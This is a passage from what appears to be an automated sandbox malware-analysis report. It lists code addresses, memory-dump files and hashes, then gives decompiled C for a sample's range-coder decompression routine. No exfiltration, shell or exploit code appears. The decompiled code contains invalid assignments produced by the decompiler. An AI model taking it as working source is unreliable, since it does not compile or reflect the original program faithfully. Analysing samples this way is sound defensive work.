                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00000000
                                                    0x00407482
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x00000000
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x0040738e
                                                    0x004075c3
                                                    0x004075e5
                                                    0x004075eb
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x004075fd
                                                    0x00407601
                                                    0x00000000
                                                    0x00406bf2
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000
                                                    0x004075fa
                                                    0x00407447
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00407524
                                                    0x00000000
                                                    0x00407399

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
